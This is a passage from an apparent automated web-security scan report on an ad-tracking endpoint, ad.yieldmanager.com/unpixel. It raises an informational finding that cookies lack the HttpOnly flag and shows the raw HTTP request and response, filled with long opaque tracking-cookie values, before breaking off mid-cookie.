ih="b!!!!M!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=?:rWHcerDr!4I`]Z@Tzh; pv1="b!!!!'!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!([!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!(["; bh="b!!!%:!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,~~!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!~~!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU~~!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu~~!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+~~!!kl,~~!!mL?!!!!#=%=pu!!mo!~~!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ~~!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S~~!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#7(x~~!#7)S~~!#7)a~~!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29~~!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.~~!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*~~!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A~~!#Z8E~~!#Ze*~~!#Zgo~~!#Zgs~~!#ZhT~~!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%~~!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7~~!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6~~!#a=7~~!#a=9~~!#aEJ~~!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V~~!#c8X~~!#c8c~~!#c8i~~!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj~~!#fBk~~!#fBm~~!#fBn~~!#fFG!!!!#=#T_g!#fG)~~!#fG+~~!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7~~!#g<y~~!#g=r~~!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c~~!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1~~!#uR3~~!#uR4~~!#uR7~~!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ~~!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q~~!$(!P~~!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf~~!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$.U:~~!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$0VL~~!$0VM~~!$3IO~~!$3JS~~"; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 302 Found
Date: Thu, 16 Jun 2011 11:28:23 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%4!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!%=(6$+!!*lZ!!!!#=$Wj6!!*oY!!!!(=(6$+!!,WM!!!!#=$Wj6!!-9J!!!!#=(6#9!!-?2!!!!,=(6$+!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!#=(6$+!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!#=(6$+!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!LHY!!!!$=#$2R!!OgU!!!!#=(6$+!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!#=(6$+!!Rp$!!!!#='oUr!!ZUR!!!!#=$_dh!!Zwa!!!!,=(6$+!!Zwb!!!!(=(6$+!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!#=(6$+!!kl,!!!!#=(6$+!!mL?!!!!#=%=pu!!mo!!!!!#=(6$+!!nAs!!!!#=$Wj6!!pd!!!!!#=(6#9!!ry1!!!!'=!msj!!tjQ!!!!#=(6$+!!u*$!!!!%=!iXa!!uGk!!!!#=(6#9!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!#=(6$+!#-B#!!!!#=$G#-!#/<F!!!!#=(6#9!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#7(x!!!!#=(6$+!#7)S!!!!#=(6$+!#7)a!!!!#=(6$+!#8*]!!!!#=$G]3!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#=$5!!!!#=(6#9!#=)8!!!!#=(6#9!#=+f!!!!#=(6#9!#=WU!!!!#=(6#9!#=Z!!!!!#=(6#9!#=^%!!!!#=(6#9!#>0(!!!!#=(6#9!#?:V!!!!#=(6#9!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#O29!!!!#=(6$+!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#=(6$+!#Q2`!!!!#=(6#9!#Q_h!!!!#=%VvP!#Qu0!!!!#=#T`h!#SV*!!!!#=(6$+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#U_(!!!!#=#$.X!#V,:!!!!#=(6#9!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#X^J!!!!#=(6#9!#Z8A!!!!#=(6$+!#Z8E!!!!#=(6$+!#Ze*!!!!#=(6$+!#Zgo!!!!#=(6$+!#Zgs!!!!#=(6$+!#ZhT!!!!#=(6$+!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!+=(6$+!#]Z#!!!!(=(6$+!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!#=(6$+!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!#=(6$+!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!#=(6$+!#a=7!!!!#=(6$+!#a=9!!!!#=(6$+!#aEJ!!!!#=(6$+!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!#=(6$+!#c8X!!!!#=(6$+!#c8c!!!!#=(6$+!#c8i!!!!#=(6$+!#c8m!!!!+=(6$+!#c8p!!!!+=(6$+!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!#=(6$+!#fBk!!!!#=(6$+!#fBm!!!!#=(6$+!#fBn!!!!#=(6$+!#fFG!!!!#=#T_g!#fG)!!!!#=(6$+!#fG+!!!!#=(6$+!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!#=(6$+!#g<y!!!!#=(6$+!#g=r!!!!#=(6$+!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qu<!!!!#=(6#9!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#=(6$+!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#=(6$+!#uR3!!!!#=(6$+!#uR4!!!!#=(6$+!#uR7!!!!#=(6$+!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!#=(6#7!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#=(6$+!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!#=(6$+!$(!P!!!!#=(6$+!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$*hf!!!!#=(6$+!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$.U:!!!!#=(6$+!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$0VL!!!!#=(6$+!$0VM!!!!#=(6$+!$3IO!!!!#=(6$+!$3JS!!!!#=(6$+"; path=/; expires=Sat, 15-Jun-2013 11:28:23 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418" height="1" width="1
Cache-Control: no-store
Last-Modified: Thu, 16 Jun 2011 11:28:23 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close

11.44. http://ad.yieldmanager.com/unpixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!$^!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!*=(5yj!#]Z#!!!!'=(5yj!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wUS!!!!+=(68J!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$/F4!!!!#=(1C-!$0V+!!!!#='htq!$2?y!!!!#=(6?g"; path=/; expires=Sat, 15-Jun-2013 12:25:27 GMT
BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=1057466 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://dis.ny.us.criteo.com/dis/dis.aspx?pu=1108&c=197&cb=46e975b383
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; uid=uid=6add2924-95ac-11e0-b4d2-43a277710b2b&_hmacv=1&_salt=4204180274&_keyid=k1&_hmac=44aa44fb7ee602e1c39d69fa3dcf95912e945eeb; liday1=#`.48[w7YU!4I`]d1$yh; ih="b!!!!M!'4@g!!!!#=$KA3!)AU6!!!!#='htn!)AU7!!!!#=(1IK!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/'y^!!!!#=(1IG!/JVV!!!!'='jNd!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1W4@!!!!#=(1IO!1e75!!!!#=%3V6!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2L<B!!!!#=(1ID!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=?:rWHcerDr!4I`]Z@Tzh; pv1="b!!!!'!$)FX!!#/o!!L9x!0eaS!%iUa!#a.5!?5%!'kH#8![:Z-!#5k@!'yJf~~~~~~=$Jui~~!!wjV!!#6W!#8='!/noe!#bl)!!!!$!?5%!'k>u7![:Z-!$>',!$FVq~~~~~~=%=]O=*PGYM.jTN!#Jl?!$5*F!$uj6!.#:D!%^Pa!!!!$!?5%!$8Ip,!@Dj0!'jh]~~~~~~~='htp=(g[2!!!([!$'!_!$5*F!%1#4!1W4@!%uAQ!!!!$!?5%!*)IX>!?Q8(!(1br~~~~~~~=(1IO=*.n+!!!(["; bh="b!!!$^!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!$=(5yj!!*lZ!!!!#=$Wj6!!*oY!!!!'=(5yj!!,WM!!!!#=$Wj6!!-?2!!!!+=(5yj!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!+=(5yj!!Zwb!!!!'=(5yj!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!